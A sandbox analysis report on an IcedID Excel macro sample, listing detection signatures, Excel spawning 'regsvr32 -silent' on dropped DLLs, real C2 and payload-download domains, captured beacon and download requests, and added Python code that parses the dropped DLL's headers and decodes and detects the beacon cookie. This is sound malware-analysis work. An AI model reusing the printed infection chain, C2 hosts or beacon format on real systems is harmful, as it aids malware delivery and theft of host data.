
Windows Analysis Report HRScheduleH3965005.xlsm

Overview

General Information

Sample Name: HRScheduleH3965005.xlsm
Analysis ID: 444771
MD5: 1799e36c7dcdafacaf883a1f9d92f62f
SHA1: d49cb116574bedd7a18eb99b3f74f9b10964f3f8
SHA256: 1756dea333ae5179a904c49f5fb16b76b03208cce0c05953552a46fd37e685f7
Tags: IcedID, xlsm

Detection

Threat name: IcedID
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel document contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2556 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 532 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2904 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2420 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Matched strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com
00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
Process Memory Space: regsvr32.exe PID: 2904 | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

Unpacked PEs

Source | Rule | Description | Author
4.2.regsvr32.exe.2000000.4.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Matched strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30bc:$string0: _gat=
  • 0x311c:$string1: _ga=
  • 0x30f4:$string2: _gid=
  • 0x30d4:$string3: _u=
  • 0x302e:$string4: _io=
  • 0x30e0:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3088:$string9: POST
  • 0x3148:$string10: aws.amazon.com
4.2.regsvr32.exe.a0000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Matched strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com
4.2.regsvr32.exe.a0000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Matched strings:
  • 0x1bc6:$internal_name: loader_dll_64.dll
  • 0x1f16:$string6: WINHTTP.dll
  • 0x1bea:$string7: DllRegisterServer
  • 0x1bfc:$string8: PluginInit

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: regsvr32 -silent ..\XRAY.dll
  CommandLine: regsvr32 -silent ..\XRAY.dll
  CommandLine|base64offset|contains: ,
  Image: C:\Windows\System32\regsvr32.exe
  NewProcessName: C:\Windows\System32\regsvr32.exe
  OriginalFileName: C:\Windows\System32\regsvr32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 2556
  ProcessCommandLine: regsvr32 -silent ..\XRAY.dll
  ProcessId: 532

Joe Sandbox Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.2000000.4.unpack; Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
Yara detected IcedID
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XTOWN.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: lsdfik[1].fml.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll; origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: thousandsyears.download
Source: global traffic; TCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: astrocycle.download
Source: global traffic; HTTP traffic detected (response carrying the payload saved as lsdfik.fml):
  HTTP/1.1 200 OK
  Date: Tue, 06 Jul 2021 15:02:22 GMT
  Content-Type: application/octet-stream
  Content-Length: 57856
  Connection: keep-alive
  Content-Disposition: attachment; filename=lsdfik.fml
  Cache-Control: max-age=14400
  CF-Cache-Status: HIT
  Age: 3950
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2tFpU8aAbVHKc8qaWG5vA44M%2FvQQDR%2FHMrJKYE2U8pvpTAJBVZB1EwE1r%2BdCJ9kIPXR9eZUJcp4sTKGEmTFWIbmcSnYHw3hmyr%2B4FkYtjbFf%2B2GBpgB79iIn9w%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66a9b6b50e8b2c22-FRA
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02
  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P
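The body above begins with MZ, the MSVC DOS stub and a Rich header, then a PE signature at offset 0xC8 with machine 0x8664 and the DLL flag set, yet it is served as application/octet-stream under the name lsdfik.fml. That is what the "Downloads executable code via HTTP", "Drops files with a non-matching file extension" and "Registers a DLL" signatures summarize. The following is an added example written for this page (it is not Joe Sandbox output and not the loader's own code): it rebuilds the captured header bytes as a constructed sample and parses them with Python's struct module. Two values the capture cuts off, the PointerToRawData and Characteristics of the .pdata section, are assumed; the raw pointer 0xE000 is inferred from the end of .data and the 0x200 FileAlignment, and it makes the section table end exactly at the Content-Length of 57856.

```python
"""Identify a PE image hiding behind an unrelated extension and read its headers.
Constructed sample: the header bytes of the lsdfik.fml response captured on this page.
Two values the capture cuts off are ASSUMED and marked below."""
import os
import struct
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}
DIRECTORY_NAMES = ["export", "import", "resource", "exception", "security", "basereloc",
                   "debug", "architecture", "globalptr", "tls", "loadconfig", "boundimport",
                   "iat", "delayimport", "clr", "reserved"]


def build_sample() -> bytes:
    """Rebuild the captured header bytes from the page's Data Raw dump."""
    dos_header = bytes.fromhex(  # e_lfanew at offset 0x3C is 0xC8
        "4d5a900003000000" "04000000ffff0000" "b800000000000000" "4000000000000000"
        "0000000000000000" "0000000000000000" "0000000000000000" "00000000c8000000")
    dos_stub = (bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")
                + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7))
    rich_header = bytes.fromhex(  # MSVC Rich header (XOR key 0x949fee4d) plus 8 bytes padding
        "098ff1c74dee9f94" "4dee9f944dee9f94" "3e8c9e954eee9f94" "4dee9e944bee9f94"
        "4dee9f9449ee9f94" "e8879f954cee9f94" "e8879d954cee9f94" "526963684dee9f94"
        "0000000000000000")
    # PE\0\0, Machine 0x8664, 4 sections, TimeDateStamp, no symbols, 0xF0 optional header, 0x2022
    coff_header = bytes.fromhex("50450000" "6486" "0400" "8606e460" "00000000" "00000000" "f000" "2220")
    optional_fixed = bytes.fromhex(  # PE32+ standard fields, 112 bytes, as captured
        "0b020000" "003a0000" "00a40000" "00000000" "20130000" "00100000" "0000008001000000"
        "00100000" "00020000" "06000000" "00000000" "06000000" "00000000" "00100100" "00040000"
        "f8ba0100" "0100" "6001" "0000100000000000" "0010000000000000" "0000100000000000"
        "0010000000000000" "00000000" "10000000")
    directories = [(0xECA0, 0xFC), (0xED9C, 0x28), (0, 0), (0x10000, 0xCC), (0, 0), (0, 0),
                   (0xEB00, 0x1C), (0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (0x5000, 0x40),
                   (0, 0), (0, 0), (0, 0)]
    optional_header = optional_fixed + b"".join(struct.pack("<II", r, s) for r, s in directories)
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b".text", 0x3828, 0x1000, 0x3A00, 0x400, 0x60000020),
        (b".rdata", 0x9E7E, 0x5000, 0xA000, 0x3E00, 0x40000040),
        (b".data", 0x60, 0xF000, 0x200, 0xDE00, 0xC0000040),
        # ASSUMED: the capture ends inside this entry; 0xE000 follows .data (0xDE00 + 0x200)
        # and 0x40000040 is the usual flag set for .pdata.
        (b".pdata", 0xCC, 0x10000, 0x200, 0xE000, 0x40000040),
    ]
    section_table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, fl)
                             for n, vs, va, rs, rp, fl in sections)
    return dos_header + dos_stub + rich_header + coff_header + optional_header + section_table


def is_pe(data: bytes) -> bool:
    """MZ at offset 0 and PE\\0\\0 where e_lfanew points, regardless of file name."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def parse_pe(data: bytes) -> dict:
    """COFF header, PE32+ optional header, data directories and section table."""
    if not is_pe(data):
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        raise ValueError(f"only PE32+ is handled here (magic 0x{magic:x})")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    subsystem, dll_characteristics = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    directories = {name: struct.unpack_from("<II", data, opt + 112 + 8 * i)
                   for i, name in enumerate(DIRECTORY_NAMES[:n_dirs])}
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, *_unused, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rawsize, "raw_pointer": rawptr,
                         "characteristics": flags})
    return {"machine": machine, "number_of_sections": nsections,
            "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
            "characteristics": characteristics, "is_dll": bool(characteristics & IMAGE_FILE_DLL),
            "entry_point": entry_point, "image_base": image_base, "subsystem": subsystem,
            "dll_characteristics": dll_characteristics, "directories": directories,
            "sections": sections}


def section_for_rva(info: dict, rva: int):
    """Name of the section that contains an RVA, or None."""
    for s in info["sections"]:
        if s["virtual_address"] <= rva < s["virtual_address"] + max(s["virtual_size"], s["raw_size"]):
            return s["name"]
    return None


def expected_file_size(info: dict) -> int:
    """Where the section table says the file ends; compare with the HTTP Content-Length."""
    return max(s["raw_pointer"] + s["raw_size"] for s in info["sections"])


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the content is a PE image but the file name does not say so."""
    return is_pe(data) and os.path.splitext(filename)[1].lower() not in PE_EXTENSIONS
```

On the captured bytes this reports a PE32+ DLL (IMAGE_FILE_DLL is set in Characteristics 0x2022) with an export directory inside .rdata, which is where the DllRegisterServer and PluginInit names matched by the YARA rule above are resolved from, and a link time of 2021-07-06 07:30:14 UTC, the same morning the sandbox fetched it. The `expected_file_size` check exists because a sandbox's "non-matching extension" verdict is only the first step; confirming that the section table agrees with the body length tells you the download is complete before you hand it to a disassembler.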
Source: global traffic; HTTP traffic detected (beacon to the configured C2, no User-Agent header):
  GET / HTTP/1.1
  Connection: Keep-Alive
  Cookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03
  Host: astrocycle.download
Source: Joe Sandbox View; IP Address: 172.67.198.51
Source: Joe Sandbox View; IP Address: 172.67.213.115
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic; HTTP traffic detected (payload download; the identical request was sent with Host: thousandsyears.download, Host: voopeople.fun and Host: uppercilio.fun):
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: thousandsyears.download
  Connection: Keep-Alive
Source: unknown; HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2027E4.png
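The GET / to astrocycle.download carries no User-Agent (the "HTTP GET or POST without a user agent" signature) and a Cookie header whose names imitate Google Analytics and AdSense cookies; the same names (_gat=, _ga=, _gid=, _u=, _io=) are the strings the Telekom Security YARA rule above keys on. The following is an added example written for this page, not part of the sandbox report and not the loader's own code: it decodes the captured cookie and checks a raw request against the shape of this beacon. Two facts are verifiable from the page itself: the first __gads field equals the Campaign ID that the malware configuration extractor recovered, and the three _u fields are hex-encoded ASCII. Public write-ups of the 2021 loader read _u as host and user identifiers, _gid as the adapter MAC (the loader imports GetAdaptersInfo) and _gat as the Windows version; those labels are analysts' interpretations, marked as assumptions in the code, and the benign request is constructed for contrast.

```python
"""Decode the IcedID loader beacon cookie captured in this report and recognise its shape."""
import re

# Constructed from the GET / request captured on this page; the Cookie header is verbatim.
CAPTURED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; "
    "_u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03\r\n"
    "Host: astrocycle.download\r\n\r\n"
)
# Constructed benign request: a browser with a User-Agent and genuine Google Analytics cookies.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: example.org\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: _ga=GA1.2.123456789.1625000000; _gid=GA1.2.987654321.1625500000; _gat=1\r\n\r\n"
)
# Output of the report's Malware Configuration Extractor (see Malware Configuration above).
EXTRACTED_CONFIG = {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
ICEDID_COOKIE_NAMES = {"__gads", "_gat", "_ga", "_u", "__io", "_gid"}


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookie_header(value: str) -> dict:
    """name=value pairs separated by ';' (values may themselves contain ':' and '.')."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def hex_to_ascii(field: str):
    """Decode an even-length hex string to printable ASCII, or None if it is not one."""
    try:
        text = bytes.fromhex(field).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_icedid_beacon(cookie_header: str) -> dict:
    """Split the beacon cookie into its fields; labels beyond campaign_id are ASSUMED."""
    cookies = parse_cookie_header(cookie_header)
    missing = ICEDID_COOKIE_NAMES - cookies.keys()
    if missing:
        raise ValueError(f"not an IcedID beacon cookie, missing {sorted(missing)}")
    gads = cookies["__gads"].split(":")
    gid = cookies["_gid"]
    return {
        "campaign_id": int(gads[0]),            # equals the extracted "Campaign ID" on this page
        "gads_rest": gads[1:],                   # meaning not stated on the page
        # ASSUMED reading: major.minor.build.trailing; 6.1.7601 is Windows 7 SP1
        "gat_fields": [int(x) for x in cookies["_gat"].split(".")],
        "ga": cookies["_ga"],
        "u_decoded": [hex_to_ascii(x) for x in cookies["_u"].split(":")],  # hex-encoded ASCII
        "io": int(cookies["__io"]),
        # ASSUMED reading: six bytes formatted as a MAC address
        "gid_mac": ":".join(gid[i:i + 2] for i in range(0, 12, 2))
        if re.fullmatch(r"[0-9A-Fa-f]{12}", gid) else None,
    }


def is_icedid_beacon(raw_request: str) -> bool:
    """GET / with no User-Agent and a cookie that decodes like the captured beacon."""
    request_line, headers = parse_request(raw_request)
    if not request_line.startswith("GET / ") or "user-agent" in headers or "cookie" not in headers:
        return False
    try:
        beacon = decode_icedid_beacon(headers["cookie"])
    except ValueError:
        return False
    return beacon["gid_mac"] is not None and all(beacon["u_decoded"])
```

Cookie names alone are a weak signal because they are real Google cookie names; the detector above therefore also requires the missing User-Agent, the bare `GET /`, a twelve-hex-digit `_gid` and `_u` fields that hex-decode to printable ASCII, none of which hold for the genuine `GA1.2.` cookies in the constructed benign request. The decoded `campaign_id` is the value to pivot on across samples, since it is the same number the configuration extractor pulled out of the unpacked DLL.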
Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp; String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp; String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: thousandsyears.download
Source: global traffic; HTTP traffic detected (response to the beacon):
  HTTP/1.1 404 Not Found
  Date: Tue, 06 Jul 2021 15:02:25 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d3szPdyTRg6bzD7Bq5SxAVq2%2FmuLykBb6CLjyhuLYziN788WdmOD6V%2BCF4ofbolE28MKKdSEx2vLiJFErQQl8xkCs1l6sttDcKgOkPu97qCFks8YeLBPfnXv54E%2BO4UxsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66a9b6c84ca94a61-FRA
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
String found in binary or memory (source process, memory dump: string):
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://astrocycle.download/
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.entrust.net/2048ca.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.entrust.net/server1.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.globalsign.net/root-r2.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.rootca1.amazontrust.com/rootca1.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.rootg2.amazo
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.rootg2.amazontrust.com/rootg2.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.sca1b.amazontrust.com/sca1b.crl0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crl.sca1b.amazontrust.com/sca1b.crl0g0-
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crt.rootca1.amazontrust.com/rootca1.cer0?
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crt.rootg2.amazontrust.com/rootg2.cer0=
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crt.sca1b.a
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://crt.sca1b.amazontrust.com/sca1b.crt0
